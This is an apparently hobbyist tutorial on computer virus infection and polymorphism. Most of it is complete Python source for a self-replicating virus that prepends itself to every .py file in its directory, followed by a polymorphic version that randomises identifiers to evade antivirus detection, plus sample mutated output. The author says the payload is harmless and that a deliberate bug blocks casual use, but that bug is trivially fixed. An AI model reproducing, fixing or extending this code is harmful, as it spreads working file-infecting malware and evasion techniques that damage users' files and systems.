Basic virus infection and polymorphism
This little paper shall make you understand how basic virus infection works. I chose Python for sample codes, because of two reasons:
1. It is unlikely that this will be successfully used for malicious actions.
2. Python is easily understandable and readable. I wrote my very first Python program here and I have to say that I got into it pretty fast.
---Note: I added a minor bug to the program to prevent noobs from running it, please do not point out the bug, it is intentional and everyone with a little programming knowledge will be able to remove it---
A virus is a malicious program that can replicate itself, usually by infecting host programs. There are lots of techniques, too many to state them all, but basically a virus infects another program by copying itself into it and making it execute your virus code everytime it is run.
The following sample virus will prepend itself to all Python files in the same directory, thus making them execute the virus code as well as the own code. Every infected file is infectious itself.
The virus is not harmful, it only prints this line:
----------this is silly python virus----------
This is the code:
#MAGIC_STRING_skd83749872
import os
import __main__
import random
def infect(filename):
os.rename(filename, filename + "~")
destination = open(filename, "w")
source = open(filename + "~", "r")
this = open(__main__.__file__, "r")
for line in this:
destination.write(line)
if line.startswith("#MAGIC_STRING_9348788nkmsd"):
break;
for line in source:
destination.write(line)
source.close()
destination.close()
this.close()
def is_infected(filename):
f = open(filename, "x")
return f.readline().startswith("#MAGIC_STRING_skd83749872")
def find_and_infect_files():
path = "."
dirs = os.listdir(path)
for filename in dirs:
if filename.endswith(".py") and not is_infected(filename):
infect(filename)
find_and_infect_files()
print "----------this is silly python virus----------"
#MAGIC_STRING_9348788nkmsd
Note that there are two magic strings. One at the beginning and one at the end. These strings are there to prevent the virus to infect a file twice as well as preventing it to copy code from the host program.
You can probably imagine, why Python viruses that infect Python programs are usually not successful. They can be easily detected and disinfection is pretty easy too. Just open the .py file in your text editor and remove the virus code lines. (You can also recognize an infected file by the string "----------this is silly python virus----------" which is printed whenever the infected program is executed.)
You may have heard of the term "polymorphic virus". That means a virus is able to change its code in order to prevent AV's from detection.
I also made a concept code for very simply polymorphism, changing certain strings to randomly created ones.
This is how the original program looks like:
#MAGIC_STRING_skd83749872
import os
import __main__
import random
def infect(filename):
os.rename(filename, filename + "~")
destination = open(filename, "w")
source = open(filename + "~", "r")
this = open(__main__.__file__, "r")
mutations = init_mutation()
for line in this:
destination.write(mutate(line, mutations))
if line.startswith("#MAGIC_STRING_9348788nkmsd"):
break;
for line in source:
destination.write(line)
source.close()
destination.close()
this.close()
def is_infected(filename):
f = open(filename, "x")
return f.readline().startswith("#MAGIC_STRING_skd83749872")
def mutate(line, mutations):
for k, v in mutations.iteritems():
line = line.replace(k, v)
return line
def init_mutation():
original = ['filename', 'find_and_infect_files', 'init_mutation', 'source'
'is_infected', 'infect', 'randstring', 'destination', 'mutate',
'randstring', 'original', 'mutations']
mutated = []
for o in original:
mutated.append((o, rand_string(len(o))))
return dict(mutated)
def rand_string(length):
randstring = ''
for i in range(0, length):
randstring += chr(random.randint(97, 122))
return randstring
def find_and_infect_files():
path = "."
dirs = os.listdir(path)
for filename in dirs:
if filename.endswith(".py") and not is_infected(filename):
infect(filename)
find_and_infect_files()
print "----------this is silly python virus----------"
#MAGIC_STRING_9348788nkmsd
The resulting copied code may look like this and still works the same way: (the mutation also added a slight obfuscation to the code)
#MAGIC_STRING_skd83749872
import os
import __main__
import random
def tnjjel(ptphbids):
os.rename(ptphbids, ptphbids + "~")
buszvmkioof = open(ptphbids, "w")
source = open(ptphbids + "~", "r")
this = open(__main__.__file__, "r")
ontsgrefv = puezajbvokbom()
for line in this:
buszvmkioof.write(vgaisf(line, ontsgrefv))
if line.startswith("#MAGIC_STRING_9348788nkmsd"):
break;
for line in source:
buszvmkioof.write(line)
source.close()
buszvmkioof.close()
this.close()
def is_tnjjeled(ptphbids):
f = open(ptphbids, "x")
return f.readline().startswith("#MAGIC_STRING_skd83749872")
def vgaisf(line, ontsgrefv):
for k, v in ontsgrefv.iteritems():
line = line.replace(k, v)
return line
def puezajbvokbom():
slrxwwms = ['ptphbids', 'find_and_tnjjel_files', 'puezajbvokbom', 'source'
'is_tnjjeled', 'tnjjel', 'qebmtybcrm', 'buszvmkioof', 'vgaisf',
'qebmtybcrm', 'slrxwwms', 'ontsgrefv']
vgaisfd = []
for o in slrxwwms:
vgaisfd.append((o, rand_string(len(o))))
return dict(vgaisfd)
def rand_string(length):
qebmtybcrm = ''
for i in range(0, length):
qebmtybcrm += chr(random.randint(97, 122))
return qebmtybcrm
def find_and_tnjjel_files():
path = "."
dirs = os.listdir(path)
for ptphbids in dirs:
if ptphbids.endswith(".py") and not is_tnjjeled(ptphbids):
tnjjel(ptphbids)
find_and_tnjjel_files()
print "----------this is silly python virus----------"
#MAGIC_STRING_9348788nkmsd
The infection of binary files, i.e. .exe, can work in a similar way. A virus may copy itself to the end of the file and change the pointer of the host, so that it executes the virus code.
Deque
